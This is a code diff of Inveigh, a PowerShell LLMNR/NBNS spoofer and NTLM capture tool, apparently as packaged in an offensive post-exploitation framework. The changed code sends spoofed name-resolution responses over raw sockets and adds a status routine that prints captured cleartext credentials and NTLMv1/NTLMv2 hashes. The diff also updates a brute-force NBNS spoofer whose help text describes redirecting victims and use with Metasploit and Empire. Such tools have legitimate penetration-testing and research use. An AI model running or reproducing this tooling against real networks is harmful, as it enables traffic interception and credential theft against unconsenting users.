+                                                     0x00,0x00 +
+                                                     $payload_bytes[0,1] +
+                                                     0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
+                                                     $LLMNR_response_data
                 
-                            if($LLMNR -eq 'y')
+                            $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)])
+                            $LLMNR_query = $LLMNR_query -replace "-00",""
+                            $LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                            $LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length)
+                
+                            if($LLMNR -eq 'Y')
                             {
-                                if((!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and $inveigh.IP_capture_list -notcontains $source_IP)
+
+                                if((!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString))
                                 {
-                                    [void]$send_socket.sendTo( $LLMNR_response_packet, $destination_point )
-                                    $send_socket.Close( )
+                                    $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp )
+                                    $send_socket.SendBufferSize = 1024
+                                    $destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port) 
+                                    $send_socket.SendTo($LLMNR_response_packet,$destination_point)
+                                    $send_socket.Close()
                                     $LLMNR_response_message = "- spoofed response has been sent"
                                 }
                                 else
                                 {
+
                                     if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
                                     {
                                         $LLMNR_response_message = "- $LLMNR_query_string is not on reply list"
@@ -1392,22 +1637,27 @@ $sniffer_scriptblock =
                                     }
                                     else
                                     {
-                                        $LLMNR_response_message = "- spoof suppressed due to previous capture"
+                                        $LLMNR_response_message = "- not spoofed due to previous capture"
                                     }
+                                
                                 }
+                            
                             }
-             
-                            $inveigh.console_queue.add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
-                            $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")])
+
+                            $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
+                            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")])
                         }
                     }
+
                 }
             }
+
         }
 
         if($RunTime)
-        {    
-            if($sniffer_stopwatch.elapsed -ge $sniffer_timeout)
+        {
+         
+            if($sniffer_stopwatch.Elapsed -ge $sniffer_timeout)
             {
 
                 if($inveigh.HTTP_listener.IsListening)
@@ -1418,14 +1668,14 @@ $sniffer_scriptblock =
 
                 if($inveigh.relay_running)
                 {
-                    $inveigh.console_queue.add("Inveigh Relay exited due to run time at $(Get-Date -format 's')")
-                    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")])
+                    $inveigh.console_queue.Add("Inveigh Relay exited due to run time at $(Get-Date -format 's')")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")])
                     Start-Sleep -m 5
                     $inveigh.relay_running = $false
                 } 
 
-                $inveigh.console_queue.add("Inveigh exited due to run time at $(Get-Date -format 's')")
-                $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Inveigh exited due to run time")])
+                $inveigh.console_queue.Add("Inveigh exited due to run time at $(Get-Date -format 's')")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to run time")])
                 Start-Sleep -m 5
                 $inveigh.running = $false
     
@@ -1437,24 +1687,27 @@ $sniffer_scriptblock =
                     {
                         $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
                         $certificate_store.Open('ReadWrite')
-                        $certificate = $certificate_store.certificates.find("FindByThumbprint",$inveigh.certificate_thumbprint,$false)[0]
+                        $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$false)[0]
                         $certificate_store.Remove($certificate)
                         $certificate_store.Close()
                     }
                     catch
                     {
+
                         if($inveigh.status_output)
                         {
-                            $inveigh.console_queue.add("SSL Certificate Deletion Error - Remove Manually")
+                            $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually")
                         }
 
-                        $inveigh.log.add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
+                        $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
 
                         if($inveigh.file_output)
                         {
-                            "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually"| Out-File $Inveigh.log_out_file -Append   
+                            "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append   
                         }
+                    
                     }
+
                 }
                 
                 $inveigh.HTTP = $false
@@ -1487,20 +1740,21 @@ $sniffer_scriptblock =
                 $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
                 $inveigh.cleartext_file_queue.RemoveRange(0,1)
             }
+
         }
+
     }
 
     $binary_reader.Close()
     $memory_stream.Dispose()
     $memory_stream.Close()
-
 }
 
 # End ScriptBlocks
 # Begin Startup Functions
 
 # HTTP/HTTPS Listener Startup Function 
-Function HTTPListener()
+function HTTPListener()
 {
     $inveigh.HTTP_listener = New-Object System.Net.HttpListener
 
@@ -1516,25 +1770,25 @@ Function HTTPListener()
 
     $inveigh.HTTP_listener.AuthenticationSchemes = "Anonymous" 
     $inveigh.HTTP_listener.Start()
-    $HTTP_runspace = [runspacefactory]::CreateRunspace()
+    $HTTP_runspace = [RunspaceFactory]::CreateRunspace()
     $HTTP_runspace.Open()
     $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
-    $HTTP_powershell = [powershell]::Create()
+    $HTTP_powershell = [PowerShell]::Create()
     $HTTP_powershell.Runspace = $HTTP_runspace
     $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
     $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
     $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($HTTPAuth).AddArgument(
-        $HTTPBasicRealm).AddArgument($MachineAccounts).AddArgument($WPADAuth) > $null
+        $HTTPBasicRealm).AddArgument($WPADAuth) > $null
     $HTTP_powershell.BeginInvoke() > $null
 }
 
 # Sniffer/Spoofer Startup Function
-Function SnifferSpoofer()
+function SnifferSpoofer()
 {
-    $sniffer_runspace = [runspacefactory]::CreateRunspace()
+    $sniffer_runspace = [RunspaceFactory]::CreateRunspace()
     $sniffer_runspace.Open()
     $sniffer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
-    $sniffer_powershell = [powershell]::Create()
+    $sniffer_powershell = [PowerShell]::Create()
     $sniffer_powershell.Runspace = $sniffer_runspace
     $sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
     $sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
@@ -1542,7 +1796,7 @@ Function SnifferSpoofer()
         $NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument(
         $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument(
         $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
-        $MachineAccounts).AddArgument($RunTime).AddArgument($LLMNRTTL).AddArgument($NBNSTTL) > $null
+        $RunTime).AddArgument($LLMNRTTL).AddArgument($NBNSTTL) > $null
     $sniffer_powershell.BeginInvoke() > $null
 }
 
@@ -1551,7 +1805,7 @@ Function SnifferSpoofer()
 # Startup Enabled Services
 
 # HTTP Server Start
-if(($inveigh.HTTP -or $inveigh.HTTPS) -and $SMBRelay -eq 'n')
+if(($inveigh.HTTP -or $inveigh.HTTPS) -and $SMBRelay -eq 'N')
 {
     HTTPListener
 }
@@ -1561,68 +1815,185 @@ SnifferSpoofer
 
 if($inveigh.console_output)
 {
+
+    if($ConsoleStatus)
+    {    
+        $console_status_timeout = new-timespan -Minutes $ConsoleStatus
+        $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+    }
+
     :console_loop while(($inveigh.running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
     {
+
         while($inveigh.console_queue.Count -gt 0)
         {
+
             if($inveigh.output_stream_only)
             {
-                write-output($inveigh.console_queue[0] + $inveigh.newline)
+                Write-Output($inveigh.console_queue[0] + $inveigh.newline)
                 $inveigh.console_queue.RemoveRange(0,1)
             }
             else
             {
+
                 switch -wildcard ($inveigh.console_queue[0])
                 {
+
                     "Inveigh *exited *"
                     {
-                        write-warning $inveigh.console_queue[0]
+                        Write-Warning $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     "* written to *"
                     {
+
                         if($inveigh.file_output)
                         {
-                            write-warning $inveigh.console_queue[0]
+                            Write-Warning $inveigh.console_queue[0]
                         }
 
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     "* for relay *"
                     {
-                        write-warning $inveigh.console_queue[0]
+                        Write-Warning $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     "*SMB relay *"
                     {
-                        write-warning $inveigh.console_queue[0]
+                        Write-Warning $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     "* local administrator *"
                     {
-                        write-warning $inveigh.console_queue[0]
+                        Write-Warning $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                     default
                     {
-                        write-output $inveigh.console_queue[0]
+                        Write-Output $inveigh.console_queue[0]
                         $inveigh.console_queue.RemoveRange(0,1)
                     }
+
                 } 
-            }   
+
+            }
+
+        }
+
+        if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
+        {
+            
+            if($inveigh.cleartext_list.Count -gt 0)
+            {
+                Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline)
+                $inveigh.cleartext_list.Sort()
+
+                foreach($unique_cleartext in $inveigh.cleartext_list)
+                {
+                    if($unique_cleartext -ne $unique_cleartext_last)
+                    {
+                        Write-Output($unique_cleartext + $inveigh.newline)
+                    }
+
+                    $unique_cleartext_last = $unique_cleartext
+                }
+
+                Start-Sleep -m 5
+            }
+            else
+            {
+                Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
+            }
+            
+            if($inveigh.NTLMv1_list.Count -gt 0)
+            {
+                Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
+                $inveigh.NTLMv1_list.Sort()
+
+                foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+                {
+                    $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+
+                    if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+                    {
+                        Write-Output($unique_NTLMv1 + $inveigh.newline)
+                    }
+
+                    $unique_NTLMv1_account_last = $unique_NTLMv1_account
+                }
+
+                $unique_NTLMv1_account_last = ''
+                Start-Sleep -m 5
+                Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
+
+                foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
+                {
+                    Write-Output($NTLMv1_username + $inveigh.newline)
+                }
+
+                Start-Sleep -m 5
+            }
+            else
+            {
+                Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
+            }
+
+            if($inveigh.NTLMv2_list.Count -gt 0)
+            {
+                Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
+                $inveigh.NTLMv2_list.Sort()
+
+                foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+                {
+                    $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+                    if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+                    {
+                        Write-Output($unique_NTLMv2 + $inveigh.newline)
+                    }
+
+                    $unique_NTLMv2_account_last = $unique_NTLMv2_account
+                }
+
+                $unique_NTLMv2_account_last = ''
+                Start-Sleep -m 5
+                Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
+
+                foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
+                {
+                    Write-Output($NTLMv2_username + $inveigh.newline)
+                }
+                
+            }
+            else
+            {
+                Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
+            }
+
+            $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+
         }
 
         if($inveigh.console_input)
         {
-            if([console]::KeyAvailable)
+
+            if([Console]::KeyAvailable)
             {
                 $inveigh.console_output = $false
                 BREAK console_loop
             }
+        
         }
 
         Start-Sleep -m 5
     }
+
 }
 
 }

--- a/data/module_source/collection/Invoke-InveighBruteForce.ps1
+++ b/data/module_source/collection/Invoke-InveighBruteForce.ps1
@@ -1,21 +1,24 @@
-Function Invoke-InveighBruteForce
+function Invoke-InveighBruteForce
 {
 <#
 .SYNOPSIS
 Invoke-InveighBruteForce is a remote (Hot Potato method)/unprivileged NBNS brute force spoofer.
 
 .DESCRIPTION
-Invoke-InveighBruteForce is a remote (Hot Potato method)/unprivileged NBNS brute force spoofer with the following features:
+Invoke-InveighBruteForce is a remote (Hot Potato method)/unprivileged NBNS brute force spoofer with the following
+features:
 
     Targeted IPv4 NBNS brute force spoofer with granular control
     NTLMv1/NTLMv2 challenge/response capture over HTTP
     Granular control of console and file output
     Run time control
 
-This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated administrator or SYSTEM shell.
+This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated
+administrator or SYSTEM shell.
 
 .PARAMETER SpooferIP
-Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Brute Force host.  
+Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system
+other than the Inveigh Brute Force host.  
 
 .PARAMETER SpooferTarget
 Specify an IP address to target for brute force NBNS spoofing. 
@@ -27,7 +30,8 @@ Default = WPAD: Specify a hostname for NBNS spoofing.
 Default = Disabled: (Y/N) Enable/Disable NBNS spoofing.
 
 .PARAMETER NBNSPause
-Default = Disabled: (Integer) Specify the number of seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received.
+Default = Disabled: (Integer) Specify the number of seconds the NBNS brute force spoofer will stop spoofing after
+an incoming HTTP request is received.
 
 .PARAMETER NBNSTTL
 Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
@@ -42,37 +46,46 @@ Default = Any: Specify a TCP IP address for the HTTP listener.
 Default = 80: Specify a TCP port for the HTTP listener.
 
 .PARAMETER HTTPAuth
-Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests.
+Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not
+apply to wpad.dat requests.
 
 .PARAMETER HTTPBasicRealm
 Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
 
 .PARAMETER HTTPResponse
-Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. Use PowerShell character escapes where necessary.
+Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat
+requests. Use PowerShell character escapes where necessary.
 
 .PARAMETER WPADAuth
-Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
+Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests.
+Setting to Anonymous can prevent browser login prompts.
 
 .PARAMETER WPADIP
-Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
+Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter
+must be used with WPADPort.
 
 .PARAMETER WPADPort
-Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
+Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter
+must be used with WPADIP.
 
 .PARAMETER WPADDirectHosts
-Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. Use PowerShell character escapes where necessary.
+Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the
+defined proxy. Use PowerShell character escapes where necessary.
 
 .PARAMETER WPADResponse
-Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set.
+Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and
+WPADPort are set.
 
 .PARAMETER Challenge
-Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
+Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a
+random challenge will be generated for each request. This will only be used for non-relay captures.
 
 .PARAMETER MachineAccounts
 Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
 
 .PARAMETER ConsoleOutput
-Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
+Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
+ensure that it doesn't hang the shell.
 
 .PARAMETER FileOutput
 Default = Disabled: (Y/N) Enable/Disable real time file output.
@@ -81,23 +94,26 @@ Default = Disabled: (Y/N) Enable/Disable real time file output.
 Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
 
 .PARAMETER OutputStreamOnly
-Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Brute Force through a shell that does not return other output streams.
-Note that you will not see the various yellow warning messages if enabled.
+Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if
+running Inveigh Brute Force through a shell that does not return other output streams. Note that you will not see
+the various yellow warning messages if enabled.
 
 .PARAMETER OutputDir
-Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled.
-
-.PARAMETER ShowHelp
-Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
+Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must
+also be enabled.
 
 .PARAMETER RunTime
 Default = Unlimited: (Integer) Set the run time duration in minutes.
 
 .PARAMETER RunCount
-Default = Unlimited: (Integer) Set the number of captures to perform before auto-exiting. 
+Default = Unlimited: (Integer) Set the number of captures to perform before auto-exiting.
+
+.PARAMETER ShowHelp
+Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
 
 .PARAMETER Tool
-Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire   
+Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's
+Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire   
 
 .EXAMPLE
 Import-Module .\Inveigh.psd1;Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 
@@ -116,36 +132,37 @@ https://github.com/Kevin-Robertson/Inveigh
 #>
 
 # Parameter default values can be modified in this section: 
+[CmdletBinding()]
 param
-( 
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTP="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$NBNS="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ConsoleOutput="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$FileOutput="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$StatusOutput="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$OutputStreamOnly="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$MachineAccounts="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y",
-    [parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Tool="0",
-    [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][string]$HTTPAuth="NTLM",
-    [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][string]$WPADAuth="NTLM",
-    [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$HTTPIP="",
-    [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SpooferIP="",
-    [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SpooferTarget="",
-    [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$WPADIP = "",
-    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$OutputDir="",
-    [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="",
-    [parameter(Mandatory=$false)][array]$WPADDirectHosts="",
-    [parameter(Mandatory=$false)][int]$HTTPPort="80",
-    [parameter(Mandatory=$false)][int]$NBNSPause="",
-    [parameter(Mandatory=$false)][int]$NBNSTTL="165",
-    [parameter(Mandatory=$false)][int]$WPADPort="",
-    [parameter(Mandatory=$false)][int]$RunCount="",
-    [parameter(Mandatory=$false)][int]$RunTime="",
-    [parameter(Mandatory=$false)][string]$HTTPBasicRealm="IIS",
-    [parameter(Mandatory=$false)][string]$HTTPResponse="",
-    [parameter(Mandatory=$false)][string]$WPADResponse="",   
-    [parameter(Mandatory=$false)][string]$Hostname = "WPAD", 
+(
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y",
+    [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0",
+    [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth="NTLM",
+    [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth="NTLM",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP="",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferTarget="",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "",
+    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir="",
+    [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge="",
+    [parameter(Mandatory=$false)][Array]$WPADDirectHosts="",
+    [parameter(Mandatory=$false)][Int]$HTTPPort="80",
+    [parameter(Mandatory=$false)][Int]$NBNSPause="",
+    [parameter(Mandatory=$false)][Int]$NBNSTTL="165",
+    [parameter(Mandatory=$false)][Int]$WPADPort="",
+    [parameter(Mandatory=$false)][Int]$RunCount="",
+    [parameter(Mandatory=$false)][Int]$RunTime="",
+    [parameter(Mandatory=$false)][String]$HTTPBasicRealm="IIS",
+    [parameter(Mandatory=$false)][String]$HTTPResponse="",
+    [parameter(Mandatory=$false)][String]$WPADResponse="",   
+    [parameter(Mandatory=$false)][String]$Hostname = "WPAD", 
     [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
 )
 
@@ -159,22 +176,24 @@ if(!$SpooferIP)
     $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)  
 }
 
-if($NBNS -eq 'y' -and !$SpooferTarget)
+if($NBNS -eq 'Y' -and !$SpooferTarget)
 {
-    Throw "You must specify a -SpooferTarget if enabling -NBNS"
+    throw "You must specify a -SpooferTarget if enabling -NBNS"
 }
 
 if($WPADIP -or $WPADPort)
 {
+
     if(!$WPADIP)
     {
-        Throw "You must specify a -WPADPort to go with -WPADIP"
+        throw "You must specify a -WPADPort to go with -WPADIP"
     }
 
     if(!$WPADPort)
     {
-        Throw "You must specify a -WPADIP to go with -WPADPort"
+        throw "You must specify a -WPADIP to go with -WPADPort"
     }
+
 }
 
 if(!$OutputDir)
@@ -188,16 +207,20 @@ else
 
 if(!$inveigh)
 {
-    $global:inveigh = [hashtable]::Synchronized(@{})
+    $global:inveigh = [HashTable]::Synchronized(@{})
     $inveigh.log = New-Object System.Collections.ArrayList
     $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
     $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
     $inveigh.cleartext_list = New-Object System.Collections.ArrayList
+    $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
+    $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
 }
 
 if($inveigh.bruteforce_running)
 {
-    Throw "Invoke-InveighBruteForce is already running, use Stop-Inveigh"
+    throw "Invoke-InveighBruteForce is already running, use Stop-Inveigh"
 }
 
 $inveigh.console_queue = New-Object System.Collections.ArrayList
@@ -218,7 +241,7 @@ $inveigh.challenge = $Challenge
 $inveigh.hostname_spoof = $false
 $inveigh.bruteforce_running = $true
 
-if($StatusOutput -eq 'y')
+if($StatusOutput -eq 'Y')
 {
     $inveigh.status_output = $true
 }
@@ -227,7 +250,7 @@ else
     $inveigh.status_output = $false
 }
 
-if($OutputStreamOnly -eq 'y')
+if($OutputStreamOnly -eq 'Y')
 {
     $inveigh.output_stream_only = $true
 }
@@ -259,190 +282,210 @@ else
 }
 
 # Write startup messages
-$inveigh.status_queue.add("Inveigh Brute Force started at $(Get-Date -format 's')")|Out-Null
-$inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Inveigh Brute Force started")]) |Out-Null
+$inveigh.status_queue.Add("Inveigh Brute Force started at $(Get-Date -format 's')") > $null
+$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force started")])  > $null
 
-if($NBNS -eq 'y')
+if($NBNS -eq 'Y')
 {   
-    $inveigh.status_queue.add("NBNS Brute Force Spoofer Target = $SpooferTarget")|Out-Null
-    $inveigh.status_queue.add("NBNS Brute Force Spoofer IP Address = $SpooferIP")|Out-Null
-    $inveigh.status_queue.add("NBNS Brute Force Spoofer Hostname = $Hostname")|Out-Null
+    $inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $SpooferTarget") > $null
+    $inveigh.status_queue.Add("NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null
+    $inveigh.status_queue.Add("NBNS Brute Force Spoofer Hostname = $Hostname") > $null
 
     if($NBNSPause)
     {
-        $inveigh.status_queue.add("NBNS Brute Force Pause = $NBNSPause Seconds")|Out-Null
+        $inveigh.status_queue.Add("NBNS Brute Force Pause = $NBNSPause Seconds") > $null
     }
 
-    $inveigh.status_queue.add("NBNS TTL = $NBNSTTL Seconds")|Out-Null
+    $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null
 }
 else
 {
-    $inveigh.status_queue.add("NBNS Brute Force Spoofer Disabled")|Out-Null
+    $inveigh.status_queue.Add("NBNS Brute Force Spoofer Disabled") > $null
 }
 
-if($HTTP -eq 'y')
+if($HTTP -eq 'Y')
 {
+
     if($HTTPIP)
     {
-        $inveigh.status_queue.add("HTTP IP Address = $HTTPIP")|Out-Null
+        $inveigh.status_queue.Add("HTTP IP Address = $HTTPIP") > $null
     }
 
     if($HTTPPort -ne 80)
     {
-        $inveigh.status_queue.add("HTTP Port = $HTTPPort")|Out-Null
+        $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null
     }
 
-    $inveigh.status_queue.add("HTTP Capture Enabled")|Out-Null
